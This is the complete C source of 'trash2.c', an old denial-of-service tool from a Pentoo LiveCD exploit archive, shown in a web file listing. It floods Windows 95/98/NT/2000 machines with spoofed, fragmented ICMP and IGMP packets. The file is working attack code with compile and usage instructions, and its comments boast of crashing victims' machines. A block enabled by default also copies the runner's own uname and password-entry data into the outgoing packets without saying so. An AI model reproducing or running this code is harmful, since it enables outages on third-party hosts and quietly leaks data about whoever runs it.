home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / trash2.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  9.5 KB  |  370 lines
  1. /* Complex denial of service attack against Windows98/95/2000/NT Machines
  2.    Overview: sends random, spoofed, ICMP/IGMP packets with random spoof source
  3.    Result: Freezes the users machine or a CPU usage will rise to extreme
  4.    lag. tested on:
  5.         2.0.35
  6.         2.2.5-15
  7.         2.2.9
  8.         2.0.36
  9.   From a 56k I killed 2/5 Win/NT Box's, 5/5 Win98, 4/6 Win95.
  10.   And those who didn't die, they where lagged to hell...
  11.   You may freely alter this code, but give credit where credit is due 
  12.     gcc -o trash2 trash2.c will do fine...
  13.     e-mail leet@ibw.com.ni for any questions. 
  14. */
  15. /* greets go out to:
  16.         bombfirst, L^Warrior, codesearc, Asphyx, killtron, ^S|lver, randip(); fucntion stolen from kox.c
  17.         acidspill, glock24, p0larbear, xjust, bxj2k, JUSTaGIRL [you know who you are]
  18.         Drth_Maul,everyone in #bitchx@unet, #outlaw@unet, #slackware@unet, #kernel@unet
  19.                                    [outlaw]
  20.  
  21. */
  22.  
  23. #include <stdio.h>
  24. #include <unistd.h>
  25. #include <stdlib.h>
  26. #include <string.h>
  27. #include <sys/types.h>
  28. #include <sys/time.h>
  29. #include <sys/socket.h>
  30. #include <pwd.h>
  31. #include <time.h>
  32. #include <sys/utsname.h>
  33. #include <netdb.h>
  34. #include <netinet/in.h>
  35. #include <netinet/ip.h>
  36. #include <netinet/ip_icmp.h>
  37. #include <netinet/igmp.h>
  38.  
  39. void banner(void)
  40. {
  41.  
  42.   printf("trash2.c - misteri0@unet [outlaw]\n\n");
  43.   printf("\n\n");
  44. }
  45. void usage(const char *progname)
  46. {
  47.   printf("usage:\n");
  48.   printf("./trash  [dst_ip] [# of packets]\n",progname);
  49.   printf("\t[*] [ip_dst] :  ex: 201.12.3.76\n");
  50.   printf("\t[*] [number]  : 100\n");
  51.   printf("\t-----------------------------------------\n");
  52. }
  53. unsigned int randip()
  54. {
  55.   struct hostent *he;
  56.   struct sockaddr_in sin;
  57.   char *buf = (char *)calloc(1, sizeof(char) * 16);
  58.  
  59.   sprintf(buf, "%d.%d.%d.%d",
  60.           (random()%191)+23,
  61.           (random()%253)+1,
  62.           (random()%253)+1,
  63.           (random()%253)+1);
  64.  
  65.   inet_aton(buf, (struct in_addr *)&sin);
  66.   return sin.sin_addr.s_addr;
  67. }
  68. int resolve( const char *name, unsigned int port, struct sockaddr_in *addr )
  69. {
  70.   struct hostent *host;
  71.   memset(addr,0,sizeof(struct sockaddr_in));
  72.   addr->sin_family = AF_INET;
  73.   addr->sin_addr.s_addr = inet_addr(name);
  74.   if (addr->sin_addr.s_addr == -1)
  75.     {
  76.       if (( host = gethostbyname(name) ) == NULL )
  77.         {
  78.           fprintf(stderr,"ERROR: Unable to resolve host %s\n",name);
  79.           return(-1);
  80.         }
  81.       addr->sin_family = host->h_addrtype;
  82.       memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
  83.     }
  84.   addr->sin_port = htons(port);
  85.   return(0);
  86. }
  87. unsigned short in_cksum(addr, len)
  88. u_short *addr;
  89. int len;
  90. {
  91.   register int nleft = len;
  92.   register u_short *w = addr;
  93.   register int sum = 0;
  94.   u_short answer = 0;
  95.  
  96.   while (nleft > 1)
  97.     {
  98.       sum += *w++;
  99.       nleft -= 2;
  100.     }
  101.  
  102.   if (nleft == 1)
  103.     {
  104.       *(u_char *)(&answer) = *(u_char *)w ;
  105.       sum += answer;
  106.     }
  107.  
  108.   sum = (sum >> 16) + (sum & 0xffff);
  109.   sum += (sum >> 16);
  110.   answer = ~sum;
  111.   return(answer);
  112. }
  113. int sendwin98bug(struct sockaddr_in *victim, unsigned long spoof)
  114. {
  115.   int BIGIGMP = 1500;
  116.   unsigned char *pkt;
  117.   struct iphdr *ip;
  118.   struct igmphdr *igmp;
  119.   struct utsname *un;
  120.   struct passwd *p;
  121.  
  122.   int i, s;
  123.   int id = (random() % 40000) + 500;
  124.  
  125.  
  126.   pkt = (unsigned char *)calloc(1, BIGIGMP);
  127.  
  128.   ip = (struct iphdr *)pkt;
  129.   igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr));
  130.  
  131.   ip->version = 4;
  132.   ip->ihl = (sizeof *ip) / 4;
  133.   ip->ttl = 255;
  134.   ip->tot_len = htons(BIGIGMP);
  135.   ip->protocol = IPPROTO_IGMP;
  136.   ip->id = htons(id);
  137.   ip->frag_off = htons(IP_MF);
  138.   ip->saddr = spoof;
  139.   ip->daddr = victim->sin_addr.s_addr;
  140.   ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));
  141.  
  142.   igmp->type = 0;
  143.   igmp->group = 0;
  144.   igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr));
  145.  
  146.   for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1;
  147.       i < BIGIGMP; i++)
  148.     pkt[i] = random() % 255;
  149. #ifndef I_GROK
  150.   un = (struct utsname *)(pkt + sizeof(struct iphdr) +
  151.                           sizeof(struct igmphdr) + 40);
  152.   uname(un);
  153.   p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10);
  154.   memcpy(p, getpwuid(getuid()), sizeof(struct passwd));
  155. #endif
  156.   if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
  157.     {
  158.       perror("error: socket()");
  159.       return 1;
  160.     }
  161.  
  162.   if(sendto(s, pkt, BIGIGMP, 0, victim,
  163.             sizeof(struct sockaddr_in)) == -1)
  164.     {
  165.       perror("error: sendto()");
  166.       return 1;
  167.     }
  168.   /* usleep(1000000); */
  169.  
  170.   for(i = 1; i < 5; i++)
  171.     {
  172.       if(i > 3)
  173.         ip->frag_off = htons(((BIGIGMP-20) * i) >> 3);
  174.       else
  175.         ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF);
  176.       sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in));
  177.       /* usleep(2000000); */
  178.     }
  179.  
  180.   free(pkt);
  181.   close(s);
  182.   return 0;
  183. }
  184.  
  185. int send_winbomb(int socket,
  186.                  unsigned long spoof_addr,
  187.                  struct sockaddr_in *dest_addr)
  188. {
  189.   unsigned char  *packet;
  190.   struct iphdr   *ip;
  191.   struct icmphdr *icmp;
  192.   int rc;
  193.  
  194.   packet = (unsigned char *)malloc(sizeof(struct iphdr) +
  195.                                    sizeof(struct icmphdr) + 8);
  196.   ip = (struct iphdr *)packet;
  197.   icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
  198.   memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
  199.   ip->ihl      = 5;
  200.   ip->version  = 4;
  201.   // ip->tos      = 2;
  202.   ip->id       = htons(1234);
  203.   ip->frag_off |= htons(0x2000);
  204.   // ip->tot_len  = 0;
  205.   ip->ttl      = 30;
  206.   ip->protocol = IPPROTO_ICMP;
  207.   ip->saddr    = spoof_addr;
  208.   ip->daddr    = dest_addr->sin_addr.s_addr;
  209.   ip->check    = in_cksum(ip, sizeof(struct iphdr));
  210.  
  211.   icmp->type              = rand() % 15;
  212.   icmp->code              = rand() % 15;
  213.   icmp->checksum          = in_cksum(icmp,sizeof(struct icmphdr) + 1);
  214.   if (sendto(socket,
  215.              packet,
  216.              sizeof(struct iphdr) +
  217.              sizeof(struct icmphdr) + 1,0,
  218.              (struct sockaddr *)dest_addr,
  219.              sizeof(struct sockaddr)) == -1)
  220.     {
  221.       return(-1);
  222.     }
  223.   ip->tot_len  = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
  224.   ip->frag_off = htons(8 >> 3);
  225.   ip->frag_off |= htons(0x2000);
  226.   ip->check    = in_cksum(ip, sizeof(struct iphdr));
  227.   icmp->type = rand() % 15;
  228.   icmp->code = rand() % 15;
  229.   icmp->checksum = 0;
  230.   if (sendto(socket,
  231.              packet,
  232.              sizeof(struct iphdr) +
  233.              sizeof(struct icmphdr) + 8,0,
  234.              (struct sockaddr *)dest_addr,
  235.              sizeof(struct sockaddr)) == -1)
  236.     {
  237.       return(-1);
  238.     }
  239.   free(packet);
  240.   return(0);
  241. }
  242. int send_igmp(int socket,
  243.               unsigned long spoof_addr,
  244.               struct sockaddr_in *dest_addr)
  245. {
  246.  
  247.   unsigned char  *packet;
  248.   struct iphdr   *ip;
  249.   struct igmphdr *igmp;
  250.   int rc;
  251.  
  252.  
  253.   packet = (unsigned char *)malloc(sizeof(struct iphdr) +
  254.                                    sizeof(struct igmphdr) + 8);
  255.  
  256.   ip = (struct iphdr *)packet;
  257.   igmp = (struct igmphdr *)(packet + sizeof(struct iphdr));
  258.  
  259.   memset(ip,0,sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
  260.  
  261.   ip->ihl      = 5;
  262.   ip->version  = 4;
  263.   ip->id       = htons(34717);
  264.   ip->frag_off = htons(0x2000);
  265.   ip->ttl      = 255;
  266.   ip->protocol = IPPROTO_IGMP;
  267.   ip->saddr    = spoof_addr;
  268.   ip->daddr    = dest_addr->sin_addr.s_addr;
  269.   ip->check    = in_cksum(ip, sizeof(struct iphdr));
  270.  
  271.  
  272.   igmp->type              = 8;
  273.   igmp->code              = 0;
  274.  
  275.   if (sendto(socket,
  276.              packet,
  277.              sizeof(struct iphdr) +
  278.              sizeof(struct igmphdr) + 1,0,
  279.              (struct sockaddr *)dest_addr,
  280.              sizeof(struct sockaddr)) == -1)
  281.     {
  282.       return(-1);
  283.     }
  284.  
  285.  
  286.   ip->tot_len  = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
  287.   ip->frag_off = htons(8 >> 3);
  288.   ip->version  = 4;
  289.   ip->id       = htons(34717);
  290.   ip->frag_off |= htons(0x2000);
  291.   ip->ttl      = 255;
  292.   ip->protocol = IPPROTO_IGMP;
  293.   ip->saddr    = spoof_addr;
  294.   ip->daddr    = dest_addr->sin_addr.s_addr;
  295.   ip->check    = in_cksum(ip, sizeof(struct iphdr));
  296.  
  297.  
  298.   igmp->type              = 8;
  299.   igmp->code              = 0;
  300.  
  301.   if (sendto(socket,
  302.              packet,
  303.              sizeof(struct iphdr) +
  304.              sizeof(struct igmphdr) + 1,0,
  305.              (struct sockaddr *)dest_addr,
  306.              sizeof(struct sockaddr)) == -1)
  307.     {
  308.       return(-1);
  309.     }
  310.  
  311.  
  312.   ip->tot_len  = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
  313.   ip->frag_off = htons(8 >> 3);
  314.   ip->frag_off |= htons(0x2000);
  315.   ip->check    = in_cksum(ip, sizeof(struct iphdr));
  316.  
  317.   igmp->type = 0;
  318.   igmp->code = 0;
  319.  
  320.   if (sendto(socket,
  321.              packet,
  322.              sizeof(struct iphdr) +
  323.              sizeof(struct igmphdr) + 8,0,
  324.              (struct sockaddr *)dest_addr,
  325.              sizeof(struct sockaddr)) == -1)
  326.     {
  327.       return(-1);
  328.     }
  329.  
  330.   free(packet);
  331.   return(0);
  332.  
  333. }
  334.  
  335. int main(int argc, char **argv)
  336. {
  337.   struct sockaddr_in dest_addr;
  338.   unsigned int i,sock;
  339.   unsigned long src_addr;
  340.   banner();
  341.   if ((argc != 3))
  342.     {
  343.       usage(argv[0]);
  344.       return(-1);
  345.     }
  346.  
  347.   if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
  348.     {
  349.       fprintf(stderr,"ERROR: Opening raw socket.\n");
  350.       return(-1);
  351.     }
  352.  
  353.   /*  if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); } */
  354.   src_addr = dest_addr.sin_addr.s_addr;
  355.   if (resolve(argv[1],0,&dest_addr) == -1)
  356.     {
  357.       return(-1);
  358.     }
  359.   printf("Status: Connected....packets sent.\n",argv[0]);
  360.   for (i = 0;i < atoi(argv[2]);i++)
  361.     {
  362.       if (send_winbomb(sock,randip(),&dest_addr) == -1 || send_igmp(sock,randip(),&dest_addr) == -1 || sendwin98bug(&dest_addr, randip()) )
  363.         {
  364.           fprintf(stderr,"ERROR: Unable to Connect To host.\n");
  365.           return(-1);
  366.         }
  367.       usleep(10000);
  368.     }
  369. }
  370. /*                    www.hack.co.za              [2000]*/